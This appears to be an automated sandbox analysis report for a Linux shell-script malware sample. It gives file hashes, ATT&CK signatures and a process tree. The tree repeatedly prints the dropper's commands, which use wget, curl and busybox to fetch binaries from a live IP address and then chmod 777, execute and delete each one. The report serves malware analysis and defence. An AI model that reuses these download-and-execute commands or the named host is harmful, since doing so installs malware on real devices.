Analysis
-
max time kernel
29s -
max time network
45s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
25/10/2024, 01:26
Static task
static1
Behavioral task
behavioral1
Sample
3cad0da87cfc3a14ea6c496218a6f38a7846f0a58c9696579e98ee15354b4c01.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
3cad0da87cfc3a14ea6c496218a6f38a7846f0a58c9696579e98ee15354b4c01.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
3cad0da87cfc3a14ea6c496218a6f38a7846f0a58c9696579e98ee15354b4c01.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
3cad0da87cfc3a14ea6c496218a6f38a7846f0a58c9696579e98ee15354b4c01.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
3cad0da87cfc3a14ea6c496218a6f38a7846f0a58c9696579e98ee15354b4c01.sh
-
Size
10KB
-
MD5
10f1892ae230c88400e80e691b208153
-
SHA1
f83482329b6b46cc1ef37aee0eba3b36ef1d7756
-
SHA256
3cad0da87cfc3a14ea6c496218a6f38a7846f0a58c9696579e98ee15354b4c01
-
SHA512
7d646519673f50ee4afd8cbd7b42a63c35cd5b58a5d217aa6d9bcb54078a446f27439806aef4602df29f2576bea05e7b0b88a87a7969c96ce8fb3e11ce13172f
-
SSDEEP
192:Omh5SdBY8PQJw8tERk4pw8tE3Yh5SdBiG:Omh5SdBdPQaRk463Yh5SdBX
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 17 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 703 chmod 737 chmod 791 chmod 817 chmod 835 chmod 671 chmod 727 chmod 785 chmod 773 chmod 810 chmod 823 chmod 847 chmod 753 chmod 797 chmod 803 chmod 829 chmod 841 chmod -
Executes dropped EXE 17 IoCs
ioc pid Process /tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z 672 SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z /tmp/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO 705 nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO /tmp/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S 729 PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S /tmp/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME 738 hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME /tmp/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV 754 8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV /tmp/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH 775 TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH /tmp/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal 786 fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal /tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V 792 WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V /tmp/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS 798 Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS /tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm 804 xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm /tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ 811 uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ /tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv 818 sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv /tmp/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8 824 ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8 /tmp/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj 830 yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj /tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm 836 xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm /tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ 842 uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ /tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv 848 sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv -
Checks CPU configuration 1 TTPs 17 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl -
System Network Configuration Discovery 1 TTPs 5 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 790 busybox 792 WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V 793 rm 788 wget 789 curl -
Writes file to tmp directory 17 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO curl File opened for modification /tmp/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV curl File opened for modification /tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ curl File opened for modification /tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm curl File opened for modification /tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv curl File opened for modification /tmp/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S curl File opened for modification /tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V curl File opened for modification /tmp/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS curl File opened for modification /tmp/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8 curl File opened for modification /tmp/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj curl File opened for modification /tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ curl File opened for modification /tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv curl File opened for modification /tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z curl File opened for modification /tmp/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME curl File opened for modification /tmp/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH curl File opened for modification /tmp/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal curl File opened for modification /tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm curl
Processes
-
/tmp/3cad0da87cfc3a14ea6c496218a6f38a7846f0a58c9696579e98ee15354b4c01.sh/tmp/3cad0da87cfc3a14ea6c496218a6f38a7846f0a58c9696579e98ee15354b4c01.sh1⤵PID:641
-
/bin/rm/bin/rm bins.sh2⤵PID:642
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z2⤵PID:647
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:659
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z2⤵PID:667
-
-
/bin/chmodchmod 777 SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z2⤵
- File and Directory Permissions Modification
PID:671
-
-
/tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z./SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z2⤵
- Executes dropped EXE
PID:672
-
-
/bin/rmrm SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z2⤵PID:673
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO2⤵PID:675
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:681
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO2⤵PID:687
-
-
/bin/chmodchmod 777 nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO2⤵
- File and Directory Permissions Modification
PID:703
-
-
/tmp/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO./nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO2⤵
- Executes dropped EXE
PID:705
-
-
/bin/rmrm nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO2⤵PID:706
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S2⤵PID:707
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:715
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S2⤵PID:723
-
-
/bin/chmodchmod 777 PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S2⤵
- File and Directory Permissions Modification
PID:727
-
-
/tmp/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S./PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S2⤵
- Executes dropped EXE
PID:729
-
-
/bin/rmrm PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S2⤵PID:730
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME2⤵PID:732
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:735
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME2⤵PID:736
-
-
/bin/chmodchmod 777 hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME2⤵
- File and Directory Permissions Modification
PID:737
-
-
/tmp/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME./hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME2⤵
- Executes dropped EXE
PID:738
-
-
/bin/rmrm hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME2⤵PID:739
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV2⤵PID:740
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:743
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV2⤵PID:748
-
-
/bin/chmodchmod 777 8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV2⤵
- File and Directory Permissions Modification
PID:753
-
-
/tmp/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV./8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV2⤵
- Executes dropped EXE
PID:754
-
-
/bin/rmrm 8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV2⤵PID:755
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH2⤵PID:756
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:761
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH2⤵PID:769
-
-
/bin/chmodchmod 777 TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH2⤵
- File and Directory Permissions Modification
PID:773
-
-
/tmp/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH./TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH2⤵
- Executes dropped EXE
PID:775
-
-
/bin/rmrm TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH2⤵PID:776
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal2⤵PID:777
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:783
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal2⤵PID:784
-
-
/bin/chmodchmod 777 fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal2⤵
- File and Directory Permissions Modification
PID:785
-
-
/tmp/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal./fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal2⤵
- Executes dropped EXE
PID:786
-
-
/bin/rmrm fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal2⤵PID:787
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V2⤵
- System Network Configuration Discovery
PID:788
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V2⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:789
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V2⤵
- System Network Configuration Discovery
PID:790
-
-
/bin/chmodchmod 777 WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V2⤵
- File and Directory Permissions Modification
PID:791
-
-
/tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V./WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:792
-
-
/bin/rmrm WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V2⤵
- System Network Configuration Discovery
PID:793
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS2⤵PID:794
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:795
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS2⤵PID:796
-
-
/bin/chmodchmod 777 Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS2⤵
- File and Directory Permissions Modification
PID:797
-
-
/tmp/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS./Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS2⤵
- Executes dropped EXE
PID:798
-
-
/bin/rmrm Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS2⤵PID:799
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm2⤵PID:800
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:801
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm2⤵PID:802
-
-
/bin/chmodchmod 777 xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm2⤵
- File and Directory Permissions Modification
PID:803
-
-
/tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm./xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm2⤵
- Executes dropped EXE
PID:804
-
-
/bin/rmrm xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm2⤵PID:805
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ2⤵PID:806
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:807
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ2⤵PID:808
-
-
/bin/chmodchmod 777 uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ2⤵
- File and Directory Permissions Modification
PID:810
-
-
/tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ./uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ2⤵
- Executes dropped EXE
PID:811
-
-
/bin/rmrm uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ2⤵PID:812
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv2⤵PID:813
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:815
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv2⤵PID:816
-
-
/bin/chmodchmod 777 sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv2⤵
- File and Directory Permissions Modification
PID:817
-
-
/tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv./sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv2⤵
- Executes dropped EXE
PID:818
-
-
/bin/rmrm sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv2⤵PID:819
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H82⤵PID:820
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H82⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:821
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H82⤵PID:822
-
-
/bin/chmodchmod 777 ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H82⤵
- File and Directory Permissions Modification
PID:823
-
-
/tmp/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8./ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H82⤵
- Executes dropped EXE
PID:824
-
-
/bin/rmrm ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H82⤵PID:825
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj2⤵PID:826
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:827
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj2⤵PID:828
-
-
/bin/chmodchmod 777 yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj2⤵
- File and Directory Permissions Modification
PID:829
-
-
/tmp/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj./yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj2⤵
- Executes dropped EXE
PID:830
-
-
/bin/rmrm yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj2⤵PID:831
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm2⤵PID:832
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:833
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm2⤵PID:834
-
-
/bin/chmodchmod 777 xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm2⤵
- File and Directory Permissions Modification
PID:835
-
-
/tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm./xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm2⤵
- Executes dropped EXE
PID:836
-
-
/bin/rmrm xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm2⤵PID:837
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ2⤵PID:838
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:839
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ2⤵PID:840
-
-
/bin/chmodchmod 777 uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ2⤵
- File and Directory Permissions Modification
PID:841
-
-
/tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ./uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ2⤵
- Executes dropped EXE
PID:842
-
-
/bin/rmrm uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ2⤵PID:843
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv2⤵PID:844
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:845
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv2⤵PID:846
-
-
/bin/chmodchmod 777 sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv2⤵
- File and Directory Permissions Modification
PID:847
-
-
/tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv./sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv2⤵
- Executes dropped EXE
PID:848
-
-
/bin/rmrm sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv2⤵PID:849
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H82⤵PID:850
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97